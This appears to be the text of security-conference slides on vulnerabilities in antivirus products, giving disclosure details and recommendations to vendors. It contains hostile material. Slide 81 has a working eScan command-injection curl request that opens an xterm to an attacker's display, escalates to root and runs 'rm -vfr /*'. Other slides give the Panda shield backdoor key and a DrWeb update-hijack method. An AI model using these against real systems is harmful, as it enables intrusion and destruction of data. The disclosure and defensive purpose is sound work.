  • 22. Exploiting AV engines n  The x86 emulator is a key part of an AV engine. n  It's used to unpack samples in memory, to determine the behaviour of an executable program, etc... n  Various AV engines create RWX pages at fixed addresses and disable DEP as long as the emulator is used. n  Very common. Does not apply to only some random AV engine. n  ...
  • 23. Exploiting AV engines (more tips) n  By default, an AV engine will try to unpack compressed files and scan the files inside. n  A compressed archive file (zip, tgz, rar, ace, etc...) can be created with several files inside. n  The following is a common AV engines exploitation scenario: n  Send a compressed zip file. n  The very first file inside forces the emulator to be loaded and used. n  The 2nd one is the real exploit.
  • 24. Exploiting AV engines n  AV engines implement multiple emulators. n  There are emulators for x86, AMD64, ARM, JavaScript, VBScript, …. in most of the “major” AV engines. n  The emulators, as far as I can tell, cannot be used to perform heap spraying, for example. But they expose a considerable attack surface. n  It's common to find memory leaks inside the emulators, specially in the JavaScript engine. n  They can be used to construct complex exploits as we have a programming interface to craft inputs to the AV engine.
  • 25. Exploiting AV engines: Summary n  Exploiting AV engines is not different to exploiting other client-side applications. n  They don't have/offer any special self-protection. They rely on the operating system features (ASLR/DEP) and nothing else. n  And sometimes they even disable such features. n  There are programming interfaces for exploit writers: n  The emulators: x86, AMD-64, ARM, JavaScript, ... usually. n  Multiple files doing different actions each can be send in one compressed file as long as the order inside it is kept. n  Owning the AV engine means getting root or system in all AV engines I tested. There is no need for a sandbox escape, in general.
  • 26. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 27. Details about some vulnerabilities in AV engines and products... Extracted from http://theoatmeal.com/comics/grump Copyright © Matthew Inman
  • 28. Disclaimer n  I'm only showing a few of my vulnerabilities. n  I have the bad habit of eating 3 times a day... n  I contacted 5 vendors for different reasons: n  Avast. They offer a Bug Bounty. Well done guys! n  ClamAV. Their antivirus is Open Source. n  Panda. I have close friends there. n  Ikarus, ESET and F-Secure. They contacted me an asked for help nicely. n  I do not “responsibly” contact irresponsible multi-million dollar companies. n  I don't give my research for free. n  Audit your products...
  • 29. Local Escalation of Privileges
  • 30.
  • 31. Example: Panda Multiple local EoPs n  In the product Global Protection 2013 there were various processes running as SYSTEM. n  Two of those processes had a NULL process ACL: n  WebProxy.EXE and SrvLoad.EXE n  We can use CreateRemoteThread to inject a DLL, for example. n  Two very easy local escalation of privileges. n  But the processes were “protected” by the shield.
  • 32. Example: Panda Multiple local EoPs n  Another terrible bug: The Panda's installation directory had write privileges for all users. n  However, again, the directory was “protected” by the shield... n  What is the fucking shield? n  ...
  • 33. Example: Panda Multiple local EoPs n  The Panda shield is a driver that protects some Panda owned processes, the program files directory, etc... n  It reads some registry keys to determine if the shield is enabled or disabled. n  But... the registry key is world writeable. n  Also, it's funny, but there is a library (pavshld.dll) with various exported functions... n  ...
  • 34. Example: Panda Multiple local EoPs n  All exported functions contains human readable names. n  All but the 2 first functions. They are called PAVSHLD_001 and 002. n  Decided to reverse engineer them for obvious reasons... n  The 1st function is a backdoor to disable the shield. n  It receives only 1 argument, a “secret key” (GUID): n  ae217538-194a-4178-9a8f-2606b94d9f13 n  If the key is correct, then the corresponding registry keys are written. n  Well, is easier than writing yourself the registry entries...
  • 35. MOAR PANDAZ n  There are more stupid bugs in this AV engine... n  For example, no library is compiled with ASLR enabled. n  One can write a reliable exploit for Panda without any real big effort. n  And, also, one can write an exploit targeting Panda Global Protection users for any program. n  Why? Because the product injects 3 libraries without ASLR enabled in all processes. Yes.
  • 36. Panda n  I reported the vulnerabilities because I have friends there. n  Some of them are (supposedly) fixed, others not... n  The shield backdoor. n  The permissions of the Panda installation directory.
  • 37. ASLR related (Address Space Layout Randomization)
  • 38. ASLR disabled n  We already discussed that Panda Global Protection doesn't enable ASLR for all modules. n  Do you believe this is an isolated problem of just one antivirus product? n  As it is common with antivirus products/ engines, such problems are not specific...
  • 40. Forticlient n  The process av_task.exe is the actual AV scanner...
  • 41. Forticlient n  Most libraries and binaries in Forticlient doesn't have ASLR enabled. n  Exploiting Forticlient with so many non ASLR enabled modules once a bug is found is trivial. n  You may think that this is a problem that doesn't happen to the “big” ones... n  Think again.
  • 42. 2 random AVs nobody uses...
  • 43. Kaspersky n  Before SyScan 2014 Singapore, the libraries avzkrnl.dll and module vlns.kdl, a vulnerability scanner (LOL), were not ASLR enabled. n  One can write a reliable exploit for Kaspersky AV without any real effort.
  • 44. Kaspersky n  After SyScan 2014 Singapore, after making those ASLR bypasses publicly available to any body, they still didn't fix them. n  I don't know what to say... But it seems they simply don't care, like most of the AV companies in the industry. n  Why bother fixing this issue if the scanner is running as system with the highest integrity level and without any kind of sandboxing?
  • 45. BitDefender n  It's kind of easier to write an exploit for BitDefender... “Security service” my ass...
  • 46.
  • 47. BKAV n  BKAV is a Vietnamese antivirus product. n  Gartner recognizes it as a “Cool vendor in Emerging Markets”. n  I recognize it as a “Cool antivirus for writing targeted exploits”...
  • 48. BKAV n  They don't have ASLR enabled for their services...
  • 49. BKAV n  And, like Panda, they inject a non ASLR enabled library system wide, the Bkav “firewall” engine... n  ...miserably failing at securing your computer. n  BTW, this vulnerability was made PUBLIC months ago, in SyScan 2014 Singapore.
  • 50. AV developers writing security software
  • 51. Remote Denial of Service
  • 52.
  • 53. Examples: ClamAV DOS n  There is a bug in ClamAV scanning icon resource directories. n  If the number is too big, ClamAV would loop almost forever. n  Fixed by adding more limits to the engine. n  Found via dumb ass fuzzing. n  Reported. Because it's Open Source... n  https://bugzilla.clamav.net/show_bug.cgi?id=10650 n  The vulnerability was nicely handled by the ClamAV team (now Cisco).
  • 54.
  • 55. Decompression bombs (multiple AVs) n  Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001. n  A compressed file with many compressed files inside or with really big files inside. n  It can be considered a remote denial of service. n  Do you think AV engines are not vulnerable any more to such bugs with more than +10 years? n  In this case, you're wrong. n  Look to the following table....
  • 56. Failing AVs ZIP GZ BZ2 RAR 7Z ESET X (***) X (***) BitDefender X Sophos X (*) X X X Comodo X AVG X Ikarus X Kaspersky X (**) * Sophos finishes after ~30 seconds. In a “testing” machine with 16 logical CPUs and 32 GB of RAM. ** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one. *** In my latest testing, ESET finishes after 1 minute with each file in my “small testing machine”.
  • 57.
  • 58. BitDefender engine n  BitDefender is a Romanian antivirus engine. n  Their AV core is the most widely distributed AV engine in other AV products. n  To name a few: F-Secure, G-Data, eScan, LavaSoft, Immunet, ... n  It suffers from a number of vulnerabilities like almost all other AV engines/products out there. n  Finding vulnerabilities in this engine is trivial. n  Some easy examples...
  • 59. BitDefender bugs n  (Vulnerability fixed) Modifying 2 DWORDs in a PE file packed with Shrinker3 packer used to crash it: n  Those bytes were used to calculate the file and sections alignment of the new, in memory, unpacked PE file. n  When set to 0xFFFFFFFF and 0xFFFFFFF, both file and sections alignment were set to 0...
  • 60. BitDefender bugs n  ...and their values were used, later on, in some arithmetic operations: n  Those 2 bugs were trivial to discover. But they failed to find them by themselves...
  • 61. One more complex BitDefender bug... n  (Vulnerability fixed) Modifying a single byte in a Thinstall installer would make it to crash: n  After modifying one byte, the decompressed content would get corrupt. And index to a table was calculated with the corrupted content... and data likely controlled by the attacker was copied to a position also likely controllable. n  Again: this bug was trivial to discover. TRIVIAL.
  • 62. BitDefender notes n  This and all BitDefender's bugs don't affect exclusively BitDefender's products. n  It affects many AV products out there as previously mentioned. n  Adding a new AV engine to your product may sound “cool” but you're making 3rd party bugs yours. n  And, by the way, you didn't audit it before adding to your product... n  Otherwise, I doubt you would have added it.
  • 63.
  • 64. ESET Nod32 n  ESET Nod32 is a well known Slovak AV engine. n  Like many other AV engines, it suffers from a number of vulnerabilities that can be trivially discovered. n  One little example: a malformed PDF file. n  A negative or big value for any element of a /W(idth) element with arrays used to crash it. n  A simple remote denial of service.
  • 65. ESET Nod32 bug with PDF files n  According to ESET sources they use fuzzing as part of QA. n  I think they are not doing it very well... n  Finding this bug was trivial, like all the ones I previously shown. n  This bug was reported and fixed by ESET.
  • 67.
  • 68. DrWeb antivirus n  DrWeb is a russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers. n  More of their propaganda (the original web page I got this information from is inaccessible since I disclosed just 1 vulnerability during SyScan 2014 Singapore):
  • 69. DrWeb updating protocol n  DrWeb used (still does it?) to update via HTTP only. They do not use SSL/TLS. n  It used to download a catalog file first: n  Example for Linux: n  http://<server>/unix/700/drweb32.lst.lzma n  In the catalog file there was a number of updatable files + a hash for them: n  VDB files (Virus DataBases). n  DrWeb32.dll. n  The hash was, simply, a CRC32 and no component was signed, even the DrWeb32.dll library.
  • 70. DrWeb updating protocol n  The “highest grade of certificate from the government” used to require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol. n  To exploit in a LAN intercepting these domains was enough: n  update.nsk1.drweb.com n  update.drweb.com n  update.msk.drweb.com n  update.us.drweb.com n  update.msk5.drweb.com n  update.msk6.drweb.com n  update.fr1.drweb.com n  update.us1.drweb.com n  update.nsk1.drweb.com n  ...and replacing drweb32.dll with your “modified” (lzma'ed) version.
  • 71. DrWeb updating protocol n  Exploiting it was rather easy with ettercap and a quick Python web server + Unix lzma tool. n  You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file. n  I tested the bug under Linux: full code execution is possible. n  Though you need to be in a LAN to be able to do so, obviously. n  One Russian guy wrote a Metasploit exploit for Windows: n  http://habrahabr.ru/post/220113/ n  In my opinion, this updating protocol (is?) was horrible.
  • 72. DrWeb updating protocol vulnerability n  The vulnerability was fixed and “an alert” issued. n  In the “alert” they do not say they fixed a vulnerability. n  http://news.drweb.com/?i=4372&c=5&lng=ru&p=0 n  The alert is not available in English, only Russian and, I think, Chinese. n  They only said that changes were made to increase the security of the update procedure. n  Technically true: From no security to some security. n  I did not research the update. It can be fun as I'm 99% sure they are doing it wrong. n  I had no time to check for this conference, sorry :(
  • 73.
  • 74. eScan for Linux n  I was bored some random night in Singapore and found that the eScan product have a Linux version. n  I downloaded and installed it (~1 hour because of the awful hotel's connection). n  Then I started checking what it installs, finding for SUID binaries, etc... n  They use BitDefender and ClamAV engines, they don't have their own engine so, no need to test the scanners. n  I already had vulnerabilities for such engines... n  They install a Web server for management and a SUID binary called: n  /opt/MicroWorld/sbin/runasroot
  • 75. eScan for Linux n  The SUID binary allows to execute root commands to the following users: n  root n  mwconf (created during installation). n  The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... It was fixed recently. n  A command injection in the login form (PHP). n  In a “security” product. n  Yes.
  • 76. eScan for Linux login page
  • 77. eScan for Linux remote root n  This specific bug required to know/guess an existing user. Not so hard. n  People from Immunity discovered more bugs that didn't require to guess a user name and used this application as a vuln-hunting teaching tool. n  The application is buggy as hell. It's only good for learning what not to do or how to write easy exploits, as a tutorial. n  The user name and the password were used to construct an operating system command executed via the PHP's function “exec”. n  I was not able to inject in the user name. n  But I was able to inject in the password. n  ...
  • 78. Source code of login.php (I)
  • 79. Source code of login.php (II) n  The password sent to the user was passed to check_user: n  There were some very basic checks against the password. n  Specially for shell escape characters. n  But they forgot various other characters like ';'.
  • 80. Source code of common_functions.php n  Then, the given password was used in the function check_user like this:
  • 81. eScan for Linux RCE n  My super-ultra-very-txupi-complex exploit for it: $ xhost + $ export TARGET=http://target:10080 $ curl --data "product=1&uname=valid@user.com&pass=1234567; DISPLAY=YOURIP:0;xterm;" $TARGET/login.php n  Once you're in, run this to escalate privileges: $ /opt/MicroWorld/sbin/runasroot /usr/bin/ xterm n  Or anything else you want... $ /opt/MicroWorld/sbin/runasroot rm -vfr /*
  • 82. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 83. Conclusions n  In general, AV software... n  ...doesn't make you any safer against skilled attackers. n  ...increase your attack surface. n  ...make you more vulnerable to skilled attackers. n  ...are as vulnerable to attacks as any other application. n  Some AV software... n  ...may lower your operating system protections. n  ...are plagued of both local and remote vulnerabilities. n  Some AV companies... n  ...don't give a fuck about security in their products.
  • 84. Breaking antivirus software n  Introduction n  Attacking antivirus engines n  Finding vulnerabilities n  Exploiting antivirus engines n  Antivirus vulnerabilities n  Conclusions n  Recommendations
  • 85. Recommendations for AV users n  Do not blindly trust your AV product. n  BTW, do not trust your AV product. n  Also, do not trust your AV product. n  Nope. I cannot stress it enough. n  Isolate the machines with AV engines used for gateways, network inspection, etc... n  Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.
  • 86. Recommendations for AV companies n  Audit your products: source code reviews & fuzzing. n  No, AV comparatives and the like are not even remotely close to this. n  Running a Bug Bounty, like Avast, is a very good idea too. n  Do not use the highest privileges possible for scanning network packets, files, etc... n  You don't need to be root/system to scan a network packet or a file. n  You only need root/system to get the contents of that packet or file. n  Send the network packet or file contents to another, low privileged or sandboxed, process.
  • 87. Recommendations for AV companies n  Run dangerous code under an emulator, vm or, at the very least, in a sandbox. I only know 1 AV using this approach. n  The file parsers written in C/C++ code are very dangerous. n  If one finds a vulnerability and it's running inside an emulator/ sandbox one needs also an escape vulnerability to completely own the AV engine. n  Why is it harder to exploit browsers than security products? n  Or use a “safer” language. Some AV products, actually, are doing this: Using Lua, for example. n  Do not trust your own processes. They can be owned. n  I'm not talking about signing the files. n  I'm talking about your AV's running processes.
  • 88. Recommendations for AV companies n  Do not use plain HTTP for updating your product. n  Use SSL/TLS. n  Also, digitally sign all files. n  No, CRC is not a signature. Really. n  ...and verify there is nothing else after the signature. n  Also, verify the whole certification chain...
  • 89. Recommendations for AV companies n  Drop old code that is of no use today or make this code not available by default. n  Code for MS-DOS era viruses, packers, protectors, etc... n  Parsers for file format vulnerabilities in completely unsupported products nowadays. n  Such old code not touched in years is likely to have vulnerabilities. n  Ignore any antivirus comparative company asking you to detect malwares from the Jurassic era. Avoid them.